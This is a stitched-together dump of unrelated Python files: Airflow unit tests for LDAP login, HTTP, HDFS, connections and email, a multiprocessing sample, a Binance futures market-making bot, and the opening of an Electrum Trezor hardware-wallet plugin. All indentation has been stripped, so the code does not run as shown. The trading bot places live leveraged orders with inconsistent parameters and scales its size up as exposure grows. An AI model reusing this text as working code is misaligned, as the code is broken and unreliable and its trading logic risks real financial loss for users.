def test_login_logout_ldap(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeSession(object):
def __init__(self):
from requests import Response
self.response = Response()
self.response.status_code = 200
self.response._content = 'airbnb/airflow'.encode('ascii', 'ignore')
def send(self, request, **kwargs):
return self.response
def prepare_request(self, request):
if 'date' in request.params:
self.response._content += (
'/' + request.params['date']).encode('ascii', 'ignore')
return self.response
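# SimpleHttpOperator and HttpSensor tests run against the FakeSession above,
# so no real HTTP endpoint is required.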
class HttpOpSensorTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
args = {'owner': 'airflow', 'start_date': DEFAULT_DATE_ISO}
dag = DAG(TEST_DAG_ID, default_args=args)
self.dag = dag
@mock.patch('requests.Session', FakeSession)
def test_get(self):
t = SimpleHttpOperator(
task_id='get_op',
method='GET',
endpoint='/search',
data={"client": "ubuntu", "q": "airflow"},
headers={},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
@mock.patch('requests.Session', FakeSession)
def test_get_response_check(self):
t = SimpleHttpOperator(
task_id='get_op',
method='GET',
endpoint='/search',
data={"client": "ubuntu", "q": "airflow"},
response_check=lambda response: ("airbnb/airflow" in response.text),
headers={},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
@mock.patch('requests.Session', FakeSession)
def test_sensor(self):
sensor = sensors.HttpSensor(
task_id='http_sensor_check',
http_conn_id='http_default',
endpoint='/search',
request_params={"client": "ubuntu", "q": "airflow", 'date': '{{ds}}'},
headers={},
response_check=lambda response: (
"airbnb/airflow/" + DEFAULT_DATE.strftime('%Y-%m-%d')
in response.text),
poke_interval=5,
timeout=15,
dag=self.dag)
sensor.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
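# Fake hooks and clients used by the HDFS sensor tests: they emulate just
# enough of the WebHDFS and snakebite interfaces to exercise the sensor logic.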
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
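# Raised by FakeSnakeBiteClient for paths outside its canned directory
# listing, mimicking a missing-path error.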
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/datafile'}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [
{'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0,
'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs',
'path': '/datadirectory/empty_directory'}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [
{'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0,
'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs',
'path': '/datadirectory/empty_directory'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file'}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file'}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test1file'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test2file'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test3file'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'}
]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
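# Connections can be supplied through environment variables named AIRFLOW_CONN_<CONN_ID>
# containing a connection URI; the tests below rely on that mechanism.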
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with('to', 'subject', 'content', files=None, dryrun=False, cc=None, bcc=None, mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.get('smtp', 'SMTP_USER'),
configuration.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
multiprocessing_sharedctypes.py
|
"""
Sample code from the "Multiprocessing" section:
how to share data between processes using the sharedctypes submodule.
"""
from multiprocessing import Process, Value, Array
def f(n, a):
n.value = 3.1415927
for i in range(len(a)):
a[i] = -a[i]
if __name__ == '__main__':
num = Value('d', 0.0)
arr = Array('i', range(10))
p = Process(target=f, args=(num, arr))
p.start()
p.join()
print(num.value)
print(arr[:])
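# Expected output:
#   3.1415927
#   [0, -1, -2, -3, -4, -5, -6, -7, -8, -9]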
|
bot.py
|
import sys
try:
import unicorn_binance_rest_api
except ImportError:
print("Please install `unicorn-binance-rest-api`! https://pypi.org/project/unicorn-binance-rest-api/")
sys.exit(1)
binance_com_api_key = ...
binance_com_api_secret = ...
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
from unicorn_binance_rest_api.unicorn_binance_rest_api_manager import BinanceRestApiManager
import logging
import time
import threading
import os
import math
import random
import numpy as np
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
'''SYMBOL PARAMETERS'''
symbol = ... # symbol
pr_p=... # price rounding (decimal places)
pr_s=... # size rounding (decimal places)
# create instances of BinanceWebSocketApiManager
binance_com_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-futures",
throw_exception_if_unrepairable=True,
stream_buffer_maxlen=100, output_default='dict')
binance_com_rest_api_manager = BinanceRestApiManager(api_key=binance_com_api_key, api_secret=binance_com_api_secret)
# create the userData streams
binance_com_user_data_stream_id = binance_com_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_com_api_key,
api_secret=binance_com_api_secret,
output="UnicornFy",
stream_buffer_name='user')
# create the bookticker streams
bookTicker_arr_stream_id = binance_com_websocket_api_manager.create_stream(["bookTicker"], markets=symbol,
stream_buffer_name='book')
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_com_websocket_api_manager,))
worker_thread.start()
# monitor the streams
# preparation for trading
wap = 0
spread = 0
wap_window = []
spread_window = []
for i in range(8):
data = binance_com_rest_api_manager.futures_orderbook_ticker(symbol=symbol)
a = float(data.get('askPrice'))
b = float(data.get('bidPrice'))
A = float(data.get('askQty'))
B = float(data.get('bidQty'))
spread = a - b
wap = (a * B + b * A) / (A + B)
wap_window.append(wap)
spread_window.append(spread)
std_spread = np.std(spread_window)
std_wap = np.std(wap_window)
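# Warm-up: eight REST snapshots of the order book seed the rolling wap/spread windows.
# wap is the quantity-weighted mid price ((a*B + b*A)/(A + B)): the ask weighted by the
# bid quantity and the bid weighted by the ask quantity.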
print("Я ВСЁ ПОСЧИТАЛ НАЧАЛЬНИК")
'''main parameters'''
min_size = 100
std_spread = np.std(spread_window)
mean_spread = np.mean(spread_window)
'''symbol parameters'''
symbol = 'celrusdt'
pr_p=5
pr_s=0
curr_pos = 0
pos = 0
avg_price = 0
mpu = 700 # max position size in USD
mos = 0.025 # max order size as % of mpu
price_buy = round(min(wap * 0.9990, wap - mean_spread * (1 + std_spread)) , pr_p)
price_sell = round(max(wap * 1.0010, wap + mean_spread * (1 + std_spread)) , pr_p)
size = math.floor(mos * mpu / wap)
d_flag = 0 # flag for averaging into an existing position
#create first trading orders
print('PLACING ORDERS, HERE WE GO')
start=time.time()
binance_com_rest_api_manager.futures_create_order(symbol=symbol, quantity=size, type='LIMIT', side='BUY',
newClientOrderId='SimpleBuy1', price=price_buy, timeInForce='GTC')
finish=time.time()-start
print('delay',finish)
start=time.time()
binance_com_rest_api_manager.futures_create_order(symbol=symbol, quantity=size, type='LIMIT', side='SELL',
newClientOrderId='SimpleSell1', price=price_sell, timeInForce='GTC')
finish=time.time()-start
print('delay',finish)
print('ORDERS PLACED, HOORAY, WE ARE BANKRUPT')
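# Main loop: refresh the wap/spread statistics from the bookTicker stream, then react to
# ACCOUNT_UPDATE events from the user-data stream by cancelling and re-quoting around the
# current position.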
while True:
msg2 = binance_com_websocket_api_manager.pop_stream_data_from_stream_buffer(stream_buffer_name='book', mode='LIFO')
if msg2:
if msg2.get('stream') is not None:
del wap_window[0]
del spread_window[0]
a = float(msg2.get('data').get('a'))
b = float(msg2.get('data').get('b'))
A = float(msg2.get('data').get('A'))
B = float(msg2.get('data').get('B'))
wap = (a*B+b*A)/(A+B)
spread = a - b
wap_window.append(wap)
spread_window.append(spread)
std_spread = np.std(spread_window)
std_wap = np.std(wap_window)
size = round((mos*mpu/wap)*(1+(curr_pos/mpu)), pr_s)
curr_pos = abs(pos) * avg_price
price_buy = round(min(wap * 0.9980, wap*0.9980*(1-std_wap) - spread * (1 + std_spread)), pr_p)
price_sell = round(max(wap * 1.0020, wap*1.0010*(1+std_wap) + spread * (1 + std_spread)), pr_p)
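# Quotes are offset from wap by a fixed fraction and widened by the volatility of wap and
# of the spread; order size scales up with the current exposure relative to mpu.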
msg1 = binance_com_websocket_api_manager.pop_stream_data_from_stream_buffer(stream_buffer_name='user',mode='LIFO')
if msg1:
if curr_pos < mpu:
if msg1.get('stream_type') == 'ACCOUNT_UPDATE' and len(msg1.get('positions')) > 0: #quick fix index error on pos
pos = float(msg1.get('positions')[0].get('position_amount')) #get current position
tp_size=max(min_size,abs(pos))
avg_price = round(float(msg1.get('positions')[0].get('entry_price')) , pr_p)
avg_price_sell = round(float(msg1.get('positions')[0].get('entry_price')) * 0.9980, pr_p) #get position average price
avg_price_buy = round(float(msg1.get('positions')[0].get('entry_price')) * 1.0020, pr_p)
if pos < 0: #sell triggered
new_size = max(min_size, round(size * random.uniform(0.8, 1),pr_s))
i=random.randrange(1,10)
binance_com_rest_api_manager.futures_cancel_all_open_orders(symbol=symbol)
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity = tp_size, side ='BUY',
newClientOrderId='SellTP',price=avg_price_sell, timeInForce='GTC')
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity=new_size, side='SELL',
newClientOrderId=f'SimpleSell{i}',price=price_sell, timeInForce='GTC')
print("Short")
if pos > 0: #buy triggered
new_size = max(min_size, round(size * random.uniform(0.8, 1),pr_s))
i = random.randrange(1, 10)
binance_com_rest_api_manager.futures_cancel_all_open_orders(symbol=symbol)
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity=tp_size, side ='SELL',
newClientOrderId='BuyTP',price=avg_price_buy, timeInForce='GTC')
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity=new_size, side='BUY',
newClientOrderId=f'SimpleBuy{i}',price=price_buy, timeInForce='GTC')
print("Long")
if pos == 0: # flat triggered
new_size = max(min_size, round(size * random.uniform(0.8, 1),pr_s))
binance_com_rest_api_manager.futures_cancel_all_open_orders(symbol=symbol)
start=time.time()
binance_com_rest_api_manager.futures_create_order(symbol=symbol, type='LIMIT', quantity=new_size, side='BUY',
newClientOrderId='SimpleBuy', price=price_buy, timeInForce='GTC')
finish = time.time() - start
print('delay', finish)
binance_com_rest_api_manager.futures_create_order(symbol=symbol, type='LIMIT', quantity=new_size, side='SELL',
newClientOrderId='SimpleSell', price=price_sell, timeInForce='GTC')
print("Flat")
elif curr_pos >= mpu:
if msg1.get('stream_type') == 'ACCOUNT_UPDATE' and len(msg1.get('positions')) > 0: #quick fix index error on pos
pos = float(msg1.get('positions')[0].get('position_amount')) #get current position
tp_size=max(min_size,(pos))
avg_price = round(float(msg1.get('positions')[0].get('entry_price')) , pr_p)
avg_price_sell = round(float(msg1.get('positions')[0].get('entry_price')) * 0.9980, pr_p) #get position average price
avg_price_buy = round(float(msg1.get('positions')[0].get('entry_price')) * 1.0020, pr_p)
pass
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_btcc.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_btcc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_btcc import constants
from electrum_btcc.i18n import _
from electrum_btcc.plugin import BasePlugin, Device
from electrum_btcc.transaction import deserialize, Transaction
from electrum_btcc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_btcc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
